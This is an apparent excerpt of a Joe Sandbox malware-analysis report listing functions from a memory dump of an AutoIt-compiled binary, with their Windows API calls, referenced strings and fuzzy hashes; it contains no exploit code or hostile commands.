Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: f24743b83e21fc7d39129534127fb05b777b9b4bd4b1d42e005ccd85cf786da0
Instruction ID: 44b4c68ddcc9843ca11ba70481a3ed8adcc46eef9d7b0682e43fd4d3d5cde713
Opcode Fuzzy Hash: f24743b83e21fc7d39129534127fb05b777b9b4bd4b1d42e005ccd85cf786da0
Instruction Fuzzy Hash: 4AD1A0316043019FCB14EF29C891B6ABBE1EF8A350F18845DF8899B2A1DB71DD45CB72

Function 00D9C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Not an Object type, xrefs: 00D9C916
NULL Pointer assignment, xrefs: 00D9CCEE, 00D9CCFF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: ce65ecde616aacdc80e9ef6252744e4c8ca312ae89a14d3e3de17949f4ef7373
Instruction ID: 7a708dc6365265b0a94af1f6b686ef71f849bc8657dea1abdc005a9c0b390a77
Opcode Fuzzy Hash: ce65ecde616aacdc80e9ef6252744e4c8ca312ae89a14d3e3de17949f4ef7373
Instruction Fuzzy Hash: 5DE19171A10219AFDF14DF68C881BAE7BB5EF48354F189029F949AB281E770DD45CB70

Function 00D9BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00D9BFD4
VariantInit.OLEAUT32(?), ref: 00D9C0A5
VariantInit.OLEAUT32(?), ref: 00D9C1A6
VariantClear.OLEAUT32(?), ref: 00D9C1B0
VariantClear.OLEAUT32(?), ref: 00D9C211

Strings

Null Object assignment in FOR..IN loop, xrefs: 00D9C035, 00D9C163, 00D9C21F
Incorrect Object type in FOR..IN loop, xrefs: 00D9C189

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 9aa95d476d3499197aa6498ec68308831cbcad1c3ada8cc753f91291e64e61d2
Instruction ID: d6f50c669f79047172de57a0f726e21e6f31623c473eb5c971419ff4ccaed69e
Opcode Fuzzy Hash: 9aa95d476d3499197aa6498ec68308831cbcad1c3ada8cc753f91291e64e61d2
Instruction Fuzzy Hash: 32917A71A1021AABDF24CFA4CC44FAEBBB8EF45710F14911AE919AB281D7709945CBB4

Function 00D5EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D5EADA,?,?), ref: 00D5EB27
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00D5EADA,?,?), ref: 00DB4B26
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00D5EADA,?,?), ref: 00DB4B65
RegCloseKey.ADVAPI32(?,?,00D5EADA,?,?), ref: 00DB4B94

Strings

Include, xrefs: 00DB4B1E, 00DB4B5D
Software\AutoIt v3\AutoIt, xrefs: 00D5EB1D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 79639a2a8fbe0a1b9fe3e94ea92f0f081d5821684b660223d1ced3e75d199a54
Instruction ID: 981a1bb247cef1fcfc52d1309e3a1d1c01d4acc830a301e8fc7bfc57b49336cc
Opcode Fuzzy Hash: 79639a2a8fbe0a1b9fe3e94ea92f0f081d5821684b660223d1ced3e75d199a54
Instruction Fuzzy Hash: 66113A71611209BFEB04EBA8CD86EFE77BDEF04354F100069B506E6191EA70AE45EB70

Function 00D42E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D42ECB
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D42EEC
ShowWindow.USER32(00000000), ref: 00D42F00
ShowWindow.USER32(00000000), ref: 00D42F09

Strings

edit, xrefs: 00D42EE6
AutoIt v3, xrefs: 00D42EC3, 00D42EC8, 00D42EC9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d6c420f3bade3f07860b681d3d55c08fdc1f06a66b54b76d69b7fb712c52818b
Instruction ID: f8e60c906ada553c0a0305ddd3ebb1e2d2853750eb550a5c4f3a05806dba2e78
Opcode Fuzzy Hash: d6c420f3bade3f07860b681d3d55c08fdc1f06a66b54b76d69b7fb712c52818b
Instruction Fuzzy Hash: A8F030705442D07ED73057536C4CE673E7ED7C6F10F01805FB904AA2A0C16218C9CA70

Function 00D9936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00D99409
WSAGetLastError.WS2_32(00000000), ref: 00D99416
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 00D9943A
_strlen.LIBCMT ref: 00D99484
_memmove.LIBCMT ref: 00D994CA
WSAGetLastError.WS2_32(00000000), ref: 00D994F7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLast$_memmove_strlenselect
String ID:
API String ID: 2795762555-0
Opcode ID: 639dd6fb1c5484f6d43f6c2df732d57e8b234b8aba743604303a974baeef63fa
Instruction ID: 74ab782595e977cf23c8e166730dd96872ebb28dbec18e72c65deb38c223dbca
Opcode Fuzzy Hash: 639dd6fb1c5484f6d43f6c2df732d57e8b234b8aba743604303a974baeef63fa
Instruction Fuzzy Hash: A0418071500205AFCB14EBA8CC95EAEB7B9EF48310F108169F516972D2DB30EE45CB70

Function 00D86D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00D43B1E: _wcsncpy.LIBCMT ref: 00D43B32

GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00D86DBA
GetLastError.KERNEL32 ref: 00D86DC5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00D86DD9
_wcsrchr.LIBCMT ref: 00D86DFB

Part of subcall function 00D86D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00D86E31

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 87ede0ff93f1d7a500946b66e64776014e6fb0bbc914132fd3c8d5981e614e90
Instruction ID: e1a3972acd755fa283ca01b0affc9316c26a31fbd62f0d04d2fb8f24b64b1bc0
Opcode Fuzzy Hash: 87ede0ff93f1d7a500946b66e64776014e6fb0bbc914132fd3c8d5981e614e90
Instruction Fuzzy Hash: 3121AC6560131A9ADB217B74EC4AFEA73A8CF12330F284566F421C3092EF24DE848B74

Function 00D99122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9ACD3: inet_addr.WS2_32(00000000), ref: 00D9ACF5

socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00D99160
WSAGetLastError.WS2_32(00000000), ref: 00D9916F
connect.WS2_32(00000000,?,00000010), ref: 00D9918B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: e1b2977ae5f03757aac2c04e9b9073c5eac4649bdb30c757296494c416cd595b
Instruction ID: a1bd61b1d2bd24bfa444e813e3962a00e922b6c72df5fa09c810e1162b13536c
Opcode Fuzzy Hash: e1b2977ae5f03757aac2c04e9b9073c5eac4649bdb30c757296494c416cd595b
Instruction Fuzzy Hash: 102151316003129FDB00AF68CC99F6EB7AAEF49764F084519F956EB3D1DA70E8058771

Function 00D43DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00D43F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D434E2,?,00000001), ref: 00D43FCD

_free.LIBCMT ref: 00DB3C27
_free.LIBCMT ref: 00DB3C6E

Part of subcall function 00D4BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E022E8,?,00000000,?,00D43E2E,?,00000000,?,00DDDBF0,00000000,?), ref: 00D4BE8B
Part of subcall function 00D4BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D43E2E,?,00000000,?,00DDDBF0,00000000,?,00000002), ref: 00D4BEA7
Part of subcall function 00D4BDF0: __wsplitpath.LIBCMT ref: 00D4BF19
Part of subcall function 00D4BDF0: _wcscpy.LIBCMT ref: 00D4BF31
Part of subcall function 00D4BDF0: _wcscat.LIBCMT ref: 00D4BF46
Part of subcall function 00D4BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00D4BF56

Strings

Bad directive syntax error, xrefs: 00DB3C54
>>>AUTOIT SCRIPT<<<, xrefs: 00DB3A01

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 1510338132-1757145024
Opcode ID: 493d6938129fcf2981b6a3f4559aa5563751b2dcd3309e6ae327e218c9f21a4f
Instruction ID: bbe3924e598ac18b934c12dee10a18a1201c0732cf839d98b358f17940def81c
Opcode Fuzzy Hash: 493d6938129fcf2981b6a3f4559aa5563751b2dcd3309e6ae327e218c9f21a4f
Instruction Fuzzy Hash: 83913971910259EFCF04EFA8CC919EEB7B4FF05310F14452AE856AB291EB34AA05DB70

Function 00D6413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00D6418E

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00D641C9
__wopenfile.LIBCMT ref: 00D641D9

Strings

<G, xrefs: 00D6415D, 00D64180, 00D6418C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 7f6475d3d6210c49d09ee31761be1411e762b0c2a07a2f357f47d7a6ca95b61d
Instruction ID: 161143d9ca704097343ca3b6a086a761f9695aa263b55f62b4d735e8ed8c0c98
Opcode Fuzzy Hash: 7f6475d3d6210c49d09ee31761be1411e762b0c2a07a2f357f47d7a6ca95b61d
Instruction Fuzzy Hash: EF11C67090030AAFDB10BFB49C4266F3BA4FF66364B198525A419DB281EB78C9819771

Function 00D5C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00D5C948,SwapMouseButtons,00000004,?), ref: 00D5C979
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00D5C948,SwapMouseButtons,00000004,?,?,?,?,00D5BF22), ref: 00D5C99A
RegCloseKey.KERNEL32(00000000,?,?,00D5C948,SwapMouseButtons,00000004,?,?,?,?,00D5BF22), ref: 00D5C9BC

Strings

Control Panel\Mouse, xrefs: 00D5C977

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6e9aa1d52572b080dfc9246dd92172faaa7c8f029d2443bb2a3c1cba7ddc966d
Instruction ID: 32831fc60217ab4fdd0348443dc456746ce9134a63aea31869923a5915a1b15a
Opcode Fuzzy Hash: 6e9aa1d52572b080dfc9246dd92172faaa7c8f029d2443bb2a3c1cba7ddc966d
Instruction Fuzzy Hash: BA117C75521309BFDF118F68DC44EAEB7B8EF04746F00542AAC41E7210E2319E44AFB0

Function 00D7A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11bf9a339061f87263405e28e1200be784ce3d586584e1a73b54c7661f9aa393
Instruction ID: 221ee121f28dbe9dddb7622bd857d70e99cdc7275f518f00924f835c1d4685b5
Opcode Fuzzy Hash: 11bf9a339061f87263405e28e1200be784ce3d586584e1a73b54c7661f9aa393
Instruction Fuzzy Hash: FEC15175A00216EFCB14CFA8C984EAEB7B5FF88704F148599E945EB251E730DE41CB61

Function 00D8CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00D441A7: _fseek.LIBCMT ref: 00D441BF

Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF49
Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF5C

_free.LIBCMT ref: 00D8CDC9
_free.LIBCMT ref: 00D8CDD0
_free.LIBCMT ref: 00D8CE3B

Part of subcall function 00D628CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00D68715,00000000,00D688A3,00D64673,?), ref: 00D628DE
Part of subcall function 00D628CA: GetLastError.KERNEL32(00000000,?,00D68715,00000000,00D688A3,00D64673,?), ref: 00D628F0

_free.LIBCMT ref: 00D8CE43

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
Instruction ID: 5bca69db0773c2c23341f2bda94104127db00e6a6b52583021a3c69a630781f6
Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
Instruction Fuzzy Hash: D1511CB1904218AFDF15AF64CC81BAEBBB9EF48340F1044AEF659A3251D7715A808F79

Function 00D41E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D41E87

Part of subcall function 00D438E4: _memset.LIBCMT ref: 00D43965
Part of subcall function 00D438E4: _wcscpy.LIBCMT ref: 00D439B5
Part of subcall function 00D438E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D439C6

KillTimer.USER32(?,00000001), ref: 00D41EDC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D41EEB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DB4526

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 23a6c8a7be7e36ac0e2ff4d544e2c13d6d5cc777174f04cc9ea72ec6a364080f
Instruction ID: 6f26a6438f3a3743b0550c816c4778395a4cdec023a7864ac2f78cde3ada2c93
Opcode Fuzzy Hash: 23a6c8a7be7e36ac0e2ff4d544e2c13d6d5cc777174f04cc9ea72ec6a364080f
Instruction Fuzzy Hash: 19219575544784AFEB32CB248C55FEBBBEC9B41308F08009DE69E96242C7755A85CB71

Function 00D992C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F282
